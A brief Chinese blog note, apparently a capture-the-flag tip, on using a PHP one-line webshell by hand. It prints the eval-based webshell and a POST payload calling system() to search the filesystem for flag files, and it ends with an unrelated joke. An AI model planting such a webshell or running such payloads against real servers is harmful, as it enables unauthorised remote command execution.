php一句话马的手工利用

比如下面的一句话php

<?php @eval($_POST['shell']);?>

通过在hackbar中输入shell=system("find / -name 'flag*'");就可以查找本地flag文件(末尾带上分号;)

 同样windows系统也可以执行系统命令

 

参考:

一句话木马(webshell)是如何执行命令的_t1r0的技术博客_51CTO博客 

命令执行漏洞 - 再简单一点点 - 博客园 

奶奶问孙子:4+1等于几 孙子说:等于6-1。 奶奶说:你明明知道答案,为什么不说? 孙子说:年轻人不讲5的……..
原文地址:https://www.cnblogs.com/jasy/p/15338114.html